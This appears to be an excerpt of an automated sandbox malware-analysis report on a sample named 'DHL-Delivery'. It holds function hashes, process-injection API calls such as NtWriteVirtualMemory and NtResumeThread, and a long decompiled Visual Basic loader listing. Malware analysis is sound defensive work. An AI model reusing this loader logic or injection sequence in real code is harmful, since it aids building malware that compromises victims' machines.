                        • Instruction ID: 9d4c97e2e860b29e1cad41033a11c4e105c8d650ef399c54c2eebcc86defd3df
                        • Opcode Fuzzy Hash: fe0371869b97be281edb4c3a2f6e3c97a052f6b1e8c4389db26bc7c273591849
                        • Instruction Fuzzy Hash: 3D31F7286CD385CDDF285924C9783E732629F6667CFCA435BCC21870A0D37682C9C903
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AB109, Relevance: 1.6, APIs: 1, Instructions: 101librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: d27954df84329686dcc6317a16b373897b33341e1e6c4137a2e9c97bebb7ed64
                        • Instruction ID: 6111a5a711b94dd29a0caabd8f396655f9b3db1857851b2bfe5e2f154fa002d5
                        • Opcode Fuzzy Hash: d27954df84329686dcc6317a16b373897b33341e1e6c4137a2e9c97bebb7ed64
                        • Instruction Fuzzy Hash: DF31E3286C9385CDDF28592489783D722929F6663CFCA435BCC21870A0D36682C9C943
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AB132, Relevance: 1.6, APIs: 1, Instructions: 98librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: ddc093fa683842313af5bfc478e81d067cf9f4b4d0dc906fe93c7415a7b6cbaf
                        • Instruction ID: c4c00c17bdc44fab934fa3e7e1082afe9f5010948b7ceab36d48973b9b3c8980
                        • Opcode Fuzzy Hash: ddc093fa683842313af5bfc478e81d067cf9f4b4d0dc906fe93c7415a7b6cbaf
                        • Instruction Fuzzy Hash: 3621F6286C9385CEDF295964C9783D732529F6663CFCA435BCD21870A1D37682C6CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AB156, Relevance: 1.6, APIs: 1, Instructions: 95librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 97e953897176aefad5cc95e91f64acf7cbab8c4ec3c54c0f682dc886d530c181
                        • Instruction ID: c972b896024b5f2a3fa263e36775b14f0302ed006cae0baf24cec0f653a74357
                        • Opcode Fuzzy Hash: 97e953897176aefad5cc95e91f64acf7cbab8c4ec3c54c0f682dc886d530c181
                        • Instruction Fuzzy Hash: 6F21F3296C9385CDDF245964C9783D732A39F6663CFCA435BCD21870A4D37242C9CA03
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AB177, Relevance: 1.6, APIs: 1, Instructions: 93librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: e986472ac75c341826aee8e1e604afb46d0671f1a60af85d968581417782e450
                        • Instruction ID: c6871f5e132c9cf686f4fd602850f873a09c526e4725cdfa88a417f86211575c
                        • Opcode Fuzzy Hash: e986472ac75c341826aee8e1e604afb46d0671f1a60af85d968581417782e450
                        • Instruction Fuzzy Hash: DE21D3296C9385CDDF255964CAB83D732A79F6663CFCA435BC821470A5D37282C5CA03
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A6475, Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 4e1dfb85de17c3058a8d1dfc9adfa385f147169386f7891d5b7b9c507c7ec519
                        • Instruction ID: da65361b72a255dbfeb7cd56a9abe56e563ce8c78b899b15a37feab1f95bad49
                        • Opcode Fuzzy Hash: 4e1dfb85de17c3058a8d1dfc9adfa385f147169386f7891d5b7b9c507c7ec519
                        • Instruction Fuzzy Hash: 112149766DE3E28EC312DB74845A2817F62EE1351071880DDC0428B163D766870AD7E7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 021A64C5, Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 5b45ac4dbfe890a6b7bdfa522aa98d1868ee463c7b9565969b309a623666eb5f
                        • Instruction ID: 07ca4f31504d0ecaeb81c19a994eb0246f4748cbf0f9dadcd8c2dca67a91fa23
                        • Opcode Fuzzy Hash: 5b45ac4dbfe890a6b7bdfa522aa98d1868ee463c7b9565969b309a623666eb5f
                        • Instruction Fuzzy Hash: DA21E17669B3E38AC312DA75849A1827F62A91294074840EDD142CB163D7A6870AC7FB
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 021A4804, Relevance: 1.6, APIs: 1, Instructions: 83nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 4de5ddb6ddfef8ac35ae6c0c47ab3a7d3f485a219e91082f1a68961076721178
                        • Instruction ID: b891bf97829b66be20a02be700d66cfc9791973bb9cd64cee48d6f359c043998
                        • Opcode Fuzzy Hash: 4de5ddb6ddfef8ac35ae6c0c47ab3a7d3f485a219e91082f1a68961076721178
                        • Instruction Fuzzy Hash: C52123787C1346AAEF256D74CCE57E82363BF18740FC95528ED8593040C7AA80D5C752
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021AB1BA, Relevance: 1.6, APIs: 1, Instructions: 81librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 8400cab7241075f97cf786d6aa787819a05e1b21dd72b707a1c99eb6b059eb29
                        • Instruction ID: 9d4ecafc3cf7635206783632e236529dc24f26bfe00dc654e615633f56265364
                        • Opcode Fuzzy Hash: 8400cab7241075f97cf786d6aa787819a05e1b21dd72b707a1c99eb6b059eb29
                        • Instruction Fuzzy Hash: 1521D5296C9385CDDF255C78C9783DB22679F6A63CFDA025BC921470A0D37282C5CA03
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AB1FB, Relevance: 1.6, APIs: 1, Instructions: 70librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 121eec4e687558103bcb1c87b3541fa62a93c1d1f1ce885e46d1f27a02faa4f2
                        • Instruction ID: 3b4f9b8a1f77ba1fe892d01273bfc196f106b902c276575483f0d13afbcdc242
                        • Opcode Fuzzy Hash: 121eec4e687558103bcb1c87b3541fa62a93c1d1f1ce885e46d1f27a02faa4f2
                        • Instruction Fuzzy Hash: 9C110A157C93818D9E2558B889B43DB32539F6B938FDA035BC921871A4E36342C6C607
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AB232, Relevance: 1.6, APIs: 1, Instructions: 63librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 51813bf3594187a994bdc3a379a34f0433f3ab9dce757adda9d584560956d237
                        • Instruction ID: 6a0143c64810584e30938cc1e685cbfb338f68f01527f16dcd2a945a40a02da8
                        • Opcode Fuzzy Hash: 51813bf3594187a994bdc3a379a34f0433f3ab9dce757adda9d584560956d237
                        • Instruction Fuzzy Hash: DD012B157C93928D8E265CB98DB43DB32139F6A938BDA036FC521871A0D32342C2CA13
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AB283, Relevance: 1.5, APIs: 1, Instructions: 48librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: a1ef032a7f765221040aa4f058a2c6cacf10eae34046936ede4d95a9e4f392c8
                        • Instruction ID: a0476b12c342870f39fad313691adee0138b35c7a2028b8f51e9701a14ea7be7
                        • Opcode Fuzzy Hash: a1ef032a7f765221040aa4f058a2c6cacf10eae34046936ede4d95a9e4f392c8
                        • Instruction Fuzzy Hash: 20F028257C5352898E2698B9CAA43CF2213CF5A924FC6026FD122471A4D37382C7D957
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AA407, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021A9C94,00000040,021A0A1C,00000000,00000000,00000000,00000000,?,00000000,00000000,021A841B), ref: 021AA423
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        • Opcode ID: 2229240f5f416fd22c3bd5b6d6417b2833a62eb4424814c2ad989dda4904048f
                        • Instruction ID: 4a5feaa05eab9c8a2219e414b785f867e32f1cc28c92e62f58d93c91a6030e8b
                        • Opcode Fuzzy Hash: 2229240f5f416fd22c3bd5b6d6417b2833a62eb4424814c2ad989dda4904048f
                        • Instruction Fuzzy Hash: D1C012E06280002E79048A28CD48C2BB2AAC6D8B38B54C32CB872A26CCC930EC048132
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 0040F274, Relevance: 200.7, APIs: 110, Strings: 4, Instructions: 1239UNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 40f274-40f360 __vbaChkstk __vbaStrCat __vbaStrMove #711 __vbaAryVar __vbaAryCopy __vbaFreeStr __vbaFreeVarList __vbaDerefAry1 __vbaStrCmp 2 40f366-40f3dc #610 __vbaStrVarVal #540 #610 __vbaVarTstEq __vbaFreeStr __vbaFreeVarList 0->2 3 40f45c-40f463 0->3 2->3 4 40f3de-40f42c __vbaVarDup #562 __vbaFreeVar 2->4 5 40f480 3->5 6 40f465-40f47e __vbaNew2 3->6 4->3 7 40f42e-40f457 #704 __vbaStrMove __vbaFreeVar 4->7 8 40f48a-40f4da __vbaObjSet 5->8 6->8 7->3 11 40f4dc-40f4fd __vbaHresultCheckObj 8->11 12 40f4ff 8->12 13 40f506-40f50d 11->13 12->13 14 40f52a 13->14 15 40f50f-40f528 __vbaNew2 13->15 16 40f534-40f587 __vbaObjSet 14->16 15->16 19 40f589-40f5aa __vbaHresultCheckObj 16->19 20 40f5ac 16->20 21 40f5b3-40f6c6 __vbaChkstk __vbaFreeObjList __vbaFreeVar __vbaChkstk 19->21 20->21 24 40f6e8 21->24 25 40f6c8-40f6e6 __vbaHresultCheckObj 21->25 26 40f6ef-40f708 24->26 25->26 27 40f725 26->27 28 40f70a-40f723 __vbaNew2 26->28 29 40f72f-40f77f __vbaObjSet 27->29 28->29 32 40f7a1 29->32 33 40f781-40f79f __vbaHresultCheckObj 29->33 34 40f7a8-40f7af 32->34 33->34 35 40f7b1-40f7ca __vbaNew2 34->35 36 40f7cc 34->36 37 40f7d6-40f826 __vbaObjSet 35->37 36->37 40 40f828-40f849 __vbaHresultCheckObj 37->40 41 40f84b 37->41 42 40f852-40f86c __vbaLateIdCallLd 40->42 41->42 43 40f889 42->43 44 40f86e-40f887 __vbaNew2 42->44 45 40f893-40f8e0 __vbaObjSet 43->45 44->45 48 40f902 45->48 49 40f8e2-40f900 __vbaHresultCheckObj 45->49 50 40f909-40f910 48->50 49->50 51 40f912-40f92b __vbaNew2 50->51 52 40f92d 50->52 53 40f937-40f98a __vbaObjSet 51->53 52->53 56 40f98c-40f9ad __vbaHresultCheckObj 53->56 57 40f9af 53->57 58 40f9b6-40fae4 __vbaI4Var __vbaChkstk * 2 __vbaFreeObjList __vbaFreeVarList 56->58 57->58 60 40fb01 58->60 61 40fae6-40faff __vbaNew2 58->61 62 40fb0b-40fb5b __vbaObjSet 60->62 61->62 65 40fb80 62->65 66 40fb5d-40fb7e __vbaHresultCheckObj 62->66 67 40fb87-40fbf2 65->67 66->67 69 40fc14 67->69 70 40fbf4-40fc12 __vbaHresultCheckObj 67->70 71 40fc1b-40fc3b __vbaFreeObj __vbaFreeVar 69->71 70->71 72 40fc58 71->72 73 40fc3d-40fc56 __vbaNew2 71->73 74 40fc62-40fcb2 __vbaObjSet 72->74 73->74 77 40fcb4-40fcd5 __vbaHresultCheckObj 74->77 78 40fcd7 74->78 79 40fcde-40fcf8 __vbaLateIdCallLd 77->79 78->79 80 40fd15 79->80 81 40fcfa-40fd13 __vbaNew2 79->81 82 40fd1f-40fd72 __vbaObjSet 80->82 81->82 85 40fd74-40fd95 __vbaHresultCheckObj 82->85 86 40fd97 82->86 87 40fd9e-40fda5 85->87 86->87 88 40fdc2 87->88 89 40fda7-40fdc0 __vbaNew2 87->89 90 40fdcc-40fe1c __vbaObjSet 88->90 89->90 93 40fe3e 90->93 94 40fe1e-40fe3c __vbaHresultCheckObj 90->94 95 40fe45-40ff1b __vbaStrCopy __vbaChkstk __vbaI4Var __vbaFreeStr __vbaFreeObjList __vbaFreeVar 93->95 94->95 97 40ff38 95->97 98 40ff1d-40ff36 __vbaNew2 95->98 99 40ff42-40ff92 __vbaObjSet 97->99 98->99 102 40ff94-40ffb5 __vbaHresultCheckObj 99->102 103 40ffb7 99->103 104 40ffbe-40ffc5 102->104 103->104 105 40ffe2 104->105 106 40ffc7-40ffe0 __vbaNew2 104->106 107 40ffec-41003c __vbaObjSet 105->107 106->107 110 410061 107->110 111 41003e-41005f __vbaHresultCheckObj 107->111 112 410068-41006f 110->112 111->112 113 410071-41008a __vbaNew2 112->113 114 41008c 112->114 115 410096-4100e9 __vbaObjSet 113->115 114->115 118 4100eb-41010c __vbaHresultCheckObj 115->118 119 41010e 115->119 120 410115-4101ae __vbaStrCopy __vbaChkstk 118->120 119->120 122 4101d0 120->122 123 4101b0-4101ce __vbaHresultCheckObj 120->123 124 4101d7-41020e __vbaFreeStrList __vbaFreeObjList __vbaFreeVar 122->124 123->124 125 410210-410229 __vbaNew2 124->125 126 41022b 124->126 127 410235-410285 __vbaObjSet 125->127 126->127 130 410287-4102a8 __vbaHresultCheckObj 127->130 131 4102aa 127->131 132 4102b1-4102b8 130->132 131->132 133 4102d5 132->133 134 4102ba-4102d3 __vbaNew2 132->134 135 4102df-41032f __vbaObjSet 133->135 134->135 138 410331-410352 __vbaHresultCheckObj 135->138 139 410354 135->139 140 41035b-410378 __vbaLateIdCallLd 138->140 139->140 141 410395 140->141 142 41037a-410393 __vbaNew2 140->142 143 41039f-4103ef __vbaObjSet 141->143 142->143 146 4103f1-410412 __vbaHresultCheckObj 143->146 147 410414 143->147 148 41041b-410422 146->148 147->148 149 410424-41043d __vbaNew2 148->149 150 41043f 148->150 151 410449-410499 __vbaObjSet 149->151 150->151 154 41049b-4104bc __vbaHresultCheckObj 151->154 155 4104be 151->155 156 4104c5-4105ae __vbaChkstk __vbaStrVarMove __vbaStrMove 154->156 155->156 157 4105b7-41061d __vbaFreeStr __vbaFreeObjList __vbaFreeVarList 156->157 159 41063f 157->159 160 41061f-41063d __vbaHresultCheckObj 157->160 161 410646-41066d __vbaOnError 159->161 160->161
                        C-Code - Quality: 53%
                        			E0040F274(signed int _a4) {
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v36;
				intOrPtr _v40;
				char _v44;
				long long _v52;
				char _v60;
				intOrPtr _v64;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _v96;
				char _v100;
				signed int _v104;
				char _v108;
				signed int _v116;
				char _v124;
				char _v132;
				char _v140;
				intOrPtr _v148;
				char _v156;
				intOrPtr _v164;
				char _v172;
				char* _v180;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				intOrPtr _v216;
				char _v220;
				intOrPtr _v224;
				char _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				intOrPtr* _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v280;
				char _v284;
				signed int _v288;
				void* _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				intOrPtr* _v308;
				signed int _v312;
				intOrPtr* _v316;
				signed int _v320;
				signed int _v324;
				intOrPtr* _v328;
				signed int _v332;
				intOrPtr* _v336;
				signed int _v340;
				intOrPtr* _v344;
				signed int _v348;
				intOrPtr* _v352;
				signed int _v356;
				char _v360;
				signed int _v364;
				signed int _v368;
				intOrPtr* _v372;
				signed int _v376;
				intOrPtr* _v380;
				signed int _v384;
				intOrPtr* _v388;
				signed int _v392;
				intOrPtr* _v396;
				signed int _v400;
				intOrPtr* _v404;
				signed int _v408;
				intOrPtr* _v412;
				signed int _v416;
				signed int _v420;
				intOrPtr* _v424;
				signed int _v428;
				void* _v432;
				signed int _v436;
				void* _v440;
				signed int _v444;
				intOrPtr* _v448;
				signed int _v452;
				signed int _v456;
				intOrPtr _v611;
				char* _t601;
				char* _t603;
				intOrPtr* _t607;
				signed int _t611;
				signed int _t615;
				signed int _t619;
				signed int _t623;
				signed int _t642;
				signed int _t648;
				signed int _t652;
				signed int _t656;
				signed int _t660;
				char* _t665;
				signed int _t669;
				signed int _t673;
				signed int _t677;
				char* _t680;
				signed int _t702;
				signed int _t706;
				signed int _t714;
				signed int _t719;
				signed int _t723;
				signed int _t728;
				signed int _t732;
				char* _t736;
				signed int _t740;
				char* _t746;
				signed int _t758;
				signed int _t762;
				signed int _t766;
				signed int _t770;
				char* _t774;
				signed int _t778;
				signed int _t787;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t808;
				char* _t813;
				signed int _t817;
				signed int _t821;
				signed int _t825;
				char* _t835;
				signed int _t853;
				signed int* _t860;
				signed int _t864;
				char* _t870;
				void* _t877;
				intOrPtr _t900;
				intOrPtr _t903;
				signed int* _t915;
				char* _t942;
				void* _t955;
				void* _t964;
				intOrPtr _t972;
				void* _t973;

				 *[fs:0x0] = _t972;
				L004011D0();
				_v24 = _t972;
				_v20 = 0x401108;
				_v16 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v12 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, _t955, _t964, _t877,  *[fs:0x0], 0x4011d6);
				_v116 = 0x80020004;
				_v124 = 0xa;
				_push(0);
				_push(0xffffffff);
				_t601 =  &_v124;
				_push(_t601);
				_push(0x40e6a8);
				_push(0x40e6b0);
				L0040131A();
				L00401320();
				_push(_t601);
				_push( &_v140);
				L00401326();
				_t603 =  &_v140;
				_push(_t603);
				_push(0x2008);
				L0040132C();
				_v196 = _t603;
				_push( &_v196);
				_push( &_v68);
				L00401332();
				L00401314();
				_push( &_v140);
				_t607 =  &_v124;
				_push(_t607);
				_push(2);
				L0040130E();
				_t973 = _t972 + 0xc;
				_push(0);
				_push(_v68);
				L00401302();
				_push( *_t607);
				_push(0x40e6a8);
				L00401308();
				if(_t607 == 0) {
					_push( &_v124);
					L004012EA();
					_push( &_v124);
					_t860 =  &_v72;
					_push(_t860);
					L004012F0();
					_push(_t860);
					_push( &_v140);
					L004012F6();
					_push( &_v156);
					L004012EA();
					_push( &_v140);
					_t864 =  &_v156;
					_push(_t864);
					L004012FC();
					_v232 = _t864;
					L00401314();
					_push( &_v156);
					_push( &_v140);
					_push( &_v124);
					_push(3);
					L0040130E();
					_t973 = _t973 + 0x10;
					if(_v232 != 0) {
						_v180 = _a4;
						_v188 = 9;
						L004012DE();
						_t870 =  &_v124;
						_push(_t870);
						L004012E4();
						asm("sbb eax, eax");
						_v232 =  ~( ~(_t870 - 0xffff) + 1);
						L004012D8();
						if(_v232 != 0) {
							_v116 = _v116 & 0x00000000;
							_v124 = 2;
							_push(0xfffffffe);
							_push(0xfffffffe);
							_push(0xfffffffe);
							_push(0xffffffff);
							_push( &_v124);
							L004012D2();
							L00401320();
							L004012D8();
						}
					}
				}
				if( *0x412010 != 0) {
					_v308 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v308 = 0x412010;
				}
				_t611 =  &_v88;
				L004012CC();
				_v232 = _t611;
				_t615 =  *((intOrPtr*)( *_v232 + 0xa0))(_v232,  &_v72, _t611,  *((intOrPtr*)( *((intOrPtr*)( *_v308)) + 0x304))( *_v308));
				asm("fclex");
				_v236 = _t615;
				if(_v236 >= 0) {
					_v312 = _v312 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x40e6b4);
					_push(_v232);
					_push(_v236);
					L004012C0();
					_v312 = _t615;
				}
				if( *0x412010 != 0) {
					_v316 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v316 = 0x412010;
				}
				_t619 =  &_v92;
				L004012CC();
				_v240 = _t619;
				_t623 =  *((intOrPtr*)( *_v240 + 0x80))(_v240,  &_v196, _t619,  *((intOrPtr*)( *((intOrPtr*)( *_v316)) + 0x30c))( *_v316));
				asm("fclex");
				_v244 = _t623;
				if(_v244 >= 0) {
					_v320 = _v320 & 0x00000000;
				} else {
					_push(0x80);
					_push(0x40e6c4);
					_push(_v240);
					_push(_v244);
					L004012C0();
					_v320 = _t623;
				}
				_v208 = _v196;
				_v220 = 0xf09e01c0;
				_v216 = 0x5afe;
				_v280 = _v72;
				_v72 = _v72 & 0x00000000;
				_v116 = _v280;
				_v124 = 8;
				_v204 = 0x163da4;
				_v200 = 0x440c40;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v200,  &_v204, 0x10,  &_v220,  &_v208,  &_v228);
				_v52 = _v228;
				L004012BA();
				L004012D8();
				_v196 =  *0x401158;
				_v180 = 0x4294bc;
				_v188 = 3;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t642 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, 0x10,  &_v196,  &_v220, 2,  &_v88,  &_v92);
				_v232 = _t642;
				if(_v232 >= 0) {
					_v324 = _v324 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x40e54c);
					_push(_a4);
					_push(_v232);
					L004012C0();
					_v324 = _t642;
				}
				_v44 = _v220;
				_v40 = _v216;
				if( *0x412010 != 0) {
					_v328 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v328 = 0x412010;
				}
				_t648 =  &_v88;
				L004012CC();
				_v232 = _t648;
				_t652 =  *((intOrPtr*)( *_v232 + 0x70))(_v232,  &_v196, _t648,  *((intOrPtr*)( *((intOrPtr*)( *_v328)) + 0x30c))( *_v328));
				asm("fclex");
				_v236 = _t652;
				if(_v236 >= 0) {
					_v332 = _v332 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x40e6c4);
					_push(_v232);
					_push(_v236);
					L004012C0();
					_v332 = _t652;
				}
				if( *0x412010 != 0) {
					_v336 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v336 = 0x412010;
				}
				_t656 =  &_v92;
				L004012CC();
				_v240 = _t656;
				_t660 =  *((intOrPtr*)( *_v240 + 0x160))(_v240,  &_v96, _t656,  *((intOrPtr*)( *((intOrPtr*)( *_v336)) + 0x30c))( *_v336));
				asm("fclex");
				_v244 = _t660;
				if(_v244 >= 0) {
					_v340 = _v340 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x40e6c4);
					_push(_v240);
					_push(_v244);
					L004012C0();
					_v340 = _t660;
				}
				_push(0);
				_push(0);
				_push(_v96);
				_push( &_v124);
				L004012B4();
				if( *0x412010 != 0) {
					_v344 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v344 = 0x412010;
				}
				_t665 =  &_v100;
				L004012CC();
				_v248 = _t665;
				_t669 =  *((intOrPtr*)( *_v248 + 0x58))(_v248,  &_v104, _t665,  *((intOrPtr*)( *((intOrPtr*)( *_v344)) + 0x31c))( *_v344));
				asm("fclex");
				_v252 = _t669;
				if(_v252 >= 0) {
					_v348 = _v348 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x40e6d4);
					_push(_v248);
					_push(_v252);
					L004012C0();
					_v348 = _t669;
				}
				if( *0x412010 != 0) {
					_v352 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v352 = 0x412010;
				}
				_t900 =  *((intOrPtr*)( *_v352));
				_t673 =  &_v108;
				L004012CC();
				_v256 = _t673;
				_t677 =  *((intOrPtr*)( *_v256 + 0x178))(_v256,  &_v192, _t673,  *((intOrPtr*)(_t900 + 0x2fc))( *_v352));
				asm("fclex");
				_v260 = _t677;
				if(_v260 >= 0) {
					_v356 = _v356 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40e6c4);
					_push(_v256);
					_push(_v260);
					L004012C0();
					_v356 = _t677;
				}
				_v180 = L"omregn";
				_v188 = 8;
				_v284 = _v104;
